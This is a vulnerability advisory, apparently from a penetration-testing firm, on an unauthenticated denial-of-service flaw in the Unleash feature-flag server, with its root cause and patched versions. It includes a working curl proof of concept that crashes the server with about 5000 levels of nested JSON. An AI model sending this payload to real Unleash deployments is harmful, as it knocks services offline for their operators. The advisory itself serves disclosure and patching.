Unleash: Unauthenticated Denial of Service via Deeply Nested JSON
A remote, unauthenticated attacker crashes the entire Unleash server with a single POST (~10 KB) of deeply nested JSON to any OpenAPI-validated endpoint; the process exits and does not recover without a manual restart.
Advisory ID: TP-2026-035
Product: Unleash (open-source feature flag and toggle platform, unleash-server)
Vulnerability type: Denial of Service through uncontrolled recursion in JSON serialization (CWE-674)
CVE: CVE-2026-63462
CVSS 3.1: 7.5 (High) · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Affected versions: <= 8.0.0
Patched in: 8.0.4, 7.6.5, 7.5.2
Vendor advisory: GHSA-r5pq-6chh-j3xp
Reported: 9 June 2026
Summary
Unleash is a widely used open-source feature flag platform. An unauthenticated attacker can take the entire server down with a single POST request that sends deeply nested JSON (about 10 KB) to any OpenAPI-validated endpoint, including public endpoints such as /edge/validate and /edge/issue-token. When request validation fails, the error formatter calls JSON.stringify on the raw offending value from the request body without safeguards (src/lib/error/bad-data-error.ts:75). A value nested thousands of levels deep makes JSON.stringify exceed V8's call-stack limit and throw a RangeError. The synchronous exception occurs inside Express error middleware that lacks try/catch, and because the process registers no uncaughtException handler, Node terminates with exit code 1. Without a restart policy the service stays permanently offline; with one it enters a crash loop. turingpoint verified and reported the vulnerability.
Proof of Concept
# Normal behavior: shallow payload -> HTTP 400, server stays operational
curl -X POST http://localhost:4242/edge/validate \
-H 'Content-Type: application/json' -d '{"tokens":[[]]}'
# Crash trigger: deeply nested payload (~5000 levels)
curl -X POST http://localhost:4242/edge/validate \
-H 'Content-Type: application/json' \
--data-binary "$(python3 -c 'd=5000;print("{\"tokens\":["+"["*d+"]"*d+"]}")')"
# -> the connection drops, the process exits (exit 1) and stays offline
# until manually restarted.
The crash threshold is around 4000 to 4500 nesting levels; a depth of 5000 reliably takes the service down. The vulnerable code path lives in src/lib/error/bad-data-error.ts (genericErrorMessage) and affects all OpenAPI-validated routes.
References
Is Something Like This in Your Software?
Our team found this vulnerability in the course of its work. Have your applications tested by the same specialists, with a penetration test from turingpoint.
